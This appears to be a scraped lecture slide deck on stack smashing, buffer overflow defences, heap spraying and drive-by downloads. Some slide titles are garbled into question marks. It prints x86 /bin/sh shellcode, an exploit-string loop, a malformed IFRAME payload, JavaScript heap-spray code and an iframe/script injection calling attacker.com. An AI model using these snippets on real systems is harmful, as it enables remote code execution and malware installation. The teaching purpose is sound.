Stack Smashing Attacks

About This Presentation

Title:

Stack Smashing Attacks

Description:

The injected code is already in machine instruction form; therefore, a CPU can ... The virtual table is a lookup table of functions used to resolve function calls ... – PowerPoint PPT presentation

Number of Views:68

Avg rating:3.0/5.0

Slides: 57

Provided by: csieN5

Category:

more less

Transcript and Presenter's Notes

Title: Stack Smashing Attacks

1
??????? ? ????????????
2
????????

????????
?????????????????
??????
??????????
?????????????

3
?????
4
???????
5
???????????
6

Stack Smashing Attacks

7
Principle of Stack Smashing Attacks

Overwritten control transfer structures, such as
return addresses or function pointers, to
redirect program execution flow to desired code.
Attack strings carry both code and address(es) of
the code entry point.

8
Explanation of BOAs (1)
G(int a) H(3) add_g H( int b) char
c100 int i while((cigetch())!EOF)

Gs stack frame
b
return address add_g
Hs stack frame
address of Gs frame point
C99
0xabc
Z Y X
0xabb
Input String xyz
C0
0xaba
9
Explanation of BOAs (2)
Length108 bytes
G(int a) H(3) add_g H( int b) char
c100 int i while((cigetch())!EOF)

Attack String xxInjected Codexy0xabc
b
return address add_g
addrress oxabc
Hs stack frame
address of Gs frame point
y
C99
x
Injected Code
0xabc
0xabb
x x
C0
0xaba
10
Injected Code

The attacked programs usually have root
privilege therefore, the injected code is
executed with root privilege.
The injected code is already in machine
instruction form therefore, a CPU can directly
execute it.
However the above fact also means that the
injected code must match the CPU type of the
attacked host.
Usually the injected code will fork a shell
hence, after an attack, an attacker could have a
root shell.

11
Injected Code of Remote BOAs

In order to be able to interact with the newly
forked root shell, the injected code usually need
to execute the following two steps
Open a socket.
Redirect standard input and output of the newly
forked root shell to the socket.

12
Example of Injected Code for X86 Architecture
Shell Code

char shellcode "\xeb\x1f\x5e\x89\x76\x08\x31\x
c0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e
\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x
80\xe8\xdc\xff\xff\xff/bin/sh"

13
Two Factors for A Successful Buffer
Overflow-style Attack(1)

A successful buffer overflow-style attack should
be able to overflow the right place (e.g. the
place to hold a return address with the correct
value (e.g. the address of injected code entry
point)).

14
Two Factors for A Successful Buffer
Overflow-style Attack(2)
return address
buffer where the overflow start
injected code
address of injected code entry point.
offset between the beginning of the overflowed
buffer and the overflow target.
The offset and the entry point address are
non-predicable. They can not decided by just
looking the source code or local binary code.
15
Non-predicable Offset

For performance concerns, most compilers dont
allocate memory for local variables in the order
they appear in the source code, sometimes some
space may be inserted between them. (Source Code
doesnt help)
Different compiler/OS uses different allocation
strategy. (Local binaries dont help)
Address obfuscation insert random number of space
between local variables and return address.
(Super good luck may help)

16
Non-predicable Entry Point Address
webserver a b security
fhsu_at_ecsl
system data
0xbfffffff
environment variables
argument strings
command line arguments and environment variables
env pointers
argv pointers
argc
17
Strategies Used by Attackers to Increase Their
Success Chance

Repeat address patterns.
Insert NOP (0x90) operations before the entry
point of injected code.

18
Exploit Code Web Sites

Exploit World
MILWORM
Metasploit
Securiteam

19
An Exploit Code Generation Program

This program uses the following three loop to
generate the attack string which contains the
shell code.
for(i0iltsizeof(buff)i4)
(ptr)jump
for(i0iltsizeof(buff)-200-strlen(evil)i)
buffi0x90
for(j0jltstrlen(evil)j) buffievilj

Countermeasures of
Buffer Overflow Attacks

21
Countermeasures of Buffer Overflow Attacks (1)

Array bounds checking.
Non-executable stack/heap.
Safe C library.
Compiler solutions, e.g.,
StackGuard
RAD
Type safe language, e.g. Java.
Static source code analysis.

22
Countermeasures of Buffer Overflow Attacks (2)

Anomaly Detection, e.g. through system calls.
Dynamic allocation of memory for data that will
overwrite adjacent memory area.
Memory Address Obfuscation/ASLR
Randomization of executable Code.
Network-based buffer overflow detection

23
Array Bounds Checking

Fundamental solution for all kinds of buffer
overflow attacks.
High run-time overhead (1 time in some situations)

24
Non-executable Stack/Heap

The majority of buffer overflow attacks are stack
smashing attacks therefore, a non-executable
stack could block the majority of buffer overflow
attacks.
Disable some original system functions, e.g.
signal call handling, nested functions.

25
Safe C Library

Some string-related C library functions, such as
strcpy and strcat dont check the buffer
boundaries of destination buffers, hence,
modifying these kinds of unsafe library functions
could secure programs that use these function.
Replace strcpy with strncpy, or replace strcat
with strncat, and so on.
Plenty of other C statements could still results
in buffer overflow vulnerabilities.
E.g. while (((ptri)getchar())!EOF)
i

26
Compiler Solutions StackGuard

Put a canary word before each return address in
each stack frame. Usually, when a buffer overflow
attack is launched, not only the return address
but also the canary word will be overwritten
thus, by checking the integrity of the canary
word, this mechanism can defend against stack
smashing attacks.
Low performance overhead.
Change the layout of the stack frame of a
function hence, this mechanism is not compatible
with some programs, e.g. debugger.
Only protect return addresses.

27
Compiler Solutions RAD

Store another copies of return addresses in a
well-protected area, RAR.
When a function is call, instead of saving its
return address in its corresponding stack frame,
another copy of its return address is saved in
RAR. When the function finishes, before returning
to its caller, the callee checks the return
address in its stack frame to see whether the RAR
has a copy of that address. If there is no such
address in the RAR, then a buffer overflow attack
is alarmed.
Low performance overhead.
Only protect return addresses.

28
Type Safe Language, e.g. Java

These kinds of languages will automatically
perform array bound checking.
The majority of programs are not written in these
kinds of languages rewriting all programs with
these kinds of languages becomes an impossible
mission.

29
Static Source Code Analysis.

Analyze source code to find potential program
statements that could result in buffer overflow
vulnerabilities. E.g. program statements like
while(((bufi)getchar())!EOF)
i
are not safe.
False positive and false negative.
Difficulty to obtain the source code.

30
Anomaly Detection

This mechanism is based on the idea that most
malicious code that is run on a target system
will make system calls to access certain system
resources, such as files and sockets.
This technique has two main parts
Preprocessing
monitoring.
False positive and false negative.

31
Memory Address Obfuscation/ASLR

This approach randomizes the layout of items in
main memory hence attackers can only guess the
address where their injected code reside and the
address of their target functions.
Change the run-time memory layout specifying by
the original file format.
Increase the complexity of debugging a program.

32
Aspects of Address Obfuscation (1)

The first is the randomization of the base
addresses of memory regions.
This involves the randomization of the base
address of
the stack
heap
the starting address of dynamically linked
libraries
the locations of functions and static data
structures contained in the executable.
The second aspect includes permuting the order of
variables and functions.

33
Aspects of Address Obfuscation(2)

The last is the introduction of random length
gaps, such as
padding in stack frames
padding between malloc allocations
padding between variables and static data
structures
random length gaps in the code segment, with
jumps to get over them.

34
Randomization of executable Code

This method involves the randomization of the
code that is executed in a process.
This approach encrypts instructions of a process,
and decrypts instructions when they are prepared
to be executed. Because attackers dont know the
key to encrypt their code, their injected code
can not be decrypted correctly. As a result their
code can not be executed.
The main assumption of this method is that most
attacks that attempt to gain control of a system
are code-injection attacks.
Need special hardware to improve performance
overhead.

Heap Spray and Drive-by Download

36
Heap SprayWikipediaNozzle

Heap spraying is a technique used in exploits to
facilitate arbitrary code execution.
Heap spraying is a security attack using a
strategy of allocating many objects containing
the attackers exploit code in an applications
heap.
Heap spraying requires that an attacker use
another memory corruption exploit to trigger an
attack, but the act of spraying greatly
simplifies the attack and increases its
likelihood of success.

37
Heap Spray Overview Puttaraksa
38
Implementation - JavaScript

Heap sprays for web browsers
are commonly implemented in JavaScript
and
spray the heap by
making copies of a long string
and
storing these strings in an array, up to the
point where enough memory has been sprayed to
cover the area that the exploit targets.
P.S. The long string begins with a NOP sled and
ends with shellcode.

39
Implementation - ActionScript

ActionScript
In July 2009, exploits were found to be using
ActionScript to spray the heap in Adobe Flash.

40
Implementation - Images

Images
Though it has been proven that heap-spraying can
be done through other means, for instance by
loading image files into the process, this has
not seen widespread use (as of August 2008).

41
Sources of Memory Corruption Exploit

Mishandling Tag Attribute Values
Virtual Table

42
Mishandling Tag Attribute Values (1)

HTTP MS IE Malf. IFRAME/EMBED BO Symantec
It is reported that an attacker can exploit this
condition by creating a malicious Web page
containing a malformed IFRAME, FRAME or EMBED
tag.
Specifically, the attacker creates the IFRAME,
FRAME or EMBED tag by specifying large string
values for the 'SRC' and 'NAME' properties.
These values are copied into finite sized process
buffers resulting in memory corruption.

43
Mishandling Tag Attribute Values (2)Julam

ltIFRAME SRCfile//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBB NAMECCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCgt
lt/IFRAMEgt
Result
eax is written by value 0x0d0d0d0d,
eip stops at address 0x769f682f the
instruction
mov eax, eax 0x34

44
Mishandling Tag Attribute Values (3)Julam

memory new Array()
for (i0ilt700i)
memoryi block shellcode

45
Virtual Table Foster et al.

The virtual table is a lookup table of functions
used to resolve function calls in a dynamic/late
binding manner.
Class objects and structures are often stored on
the heap.
One field of a class object is a pointer to its
virtual table, called virtual-function table
pointer.

46
Virtual Table Example

For example, two class objects are instantiated
on the heap.
A static buffer in one class object is
overflowed, trespassing into another neighboring
class object.
This trespass overwrites the virtual-function
table pointer (vtable pointer) in the second
object.
The address is overwritten so that the vtable
address points into our own buffer.
We then place values into our own Trojan table
that indicate new addresses for the class
functions.
One of these is the destructor, which we
overwrite so that when the class object is
deleted, our new destructor is called.

47
Virtual Table Foster et al. Overview
__vptr
char a100
__vptr
char a100
48
Virtual Table Ratanaworabhan et al. Spraying
the Heap

ltSCRIPT language"text/javascript"gt
shellcode unescape("u4343u4343...")
oneblock unescape("u0D0Du0D0D")
var fullblock oneblock
while (fullblock.lengthlt0x40000)
fullblock fullblock
sprayContainer new Array()
for (i0 ilt1000 i)
sprayContaineri fullblock shellcode
lt/SCRIPTgt

Shell Code
NOP Sled
49
Result

Because the size of the sprayed heap area may be
tens of MBs, ASLR may not work as expected.

50
Drive-by Download Attacks wikipedia

Download of spyware, a computer virus or any kind
of malware that happens without knowledge of the
user.
Drive-by downloads may happen by
visiting a website
viewing an e-mail message
or
by clicking on a deceptive popup window.

51
Clicking on a Deceptive Popup Window

For instance, a user clicks on the window in the
mistaken belief
that it is an error report from his own PC
or
that it is an innocuous advertisement popup.
In such cases, the "supplier" may claim that the
user "consented" to the download though s/he was
completely unaware of having initiated a
malicious software download.

52
Drive-by Downloads using Web Pages

Features
Same appearance as the original webpage
Secret downloads
Automatic installation
Based on vulnerabilities of browsers, plug-ins,
or OSes

53
Client side
WWW
Good web server
Vulnerable browser
Malicious web server
bad.htm
attacker.com
ltiframe srchttp//attacker.com/bad.htm
height0 width0gt lt/iframegt ltscript
srchttp//attacker.com/bad.jsgtlt/scriptgt
54
Client side
WWW
Good web server
Vulnerable browser
Malicious web server
bad.htm
attacker.com
document.write(unescape("3C73637269707420
6C616E67756167653D226A617661736372
697074223E0D0A6966286E61766967617
46F722E757365724167656E742E746F4C
6F7765724361736528292E696E6465784F
6628225C7836445C7837335C78
attacker2.com
55
Discuss

Why not inject shell code at the first stage?
(i.e. inject shell code to the good web server
directly)
Can we just ban the domains attacker.com and
attacker2.com?

56
Drive-by Downloads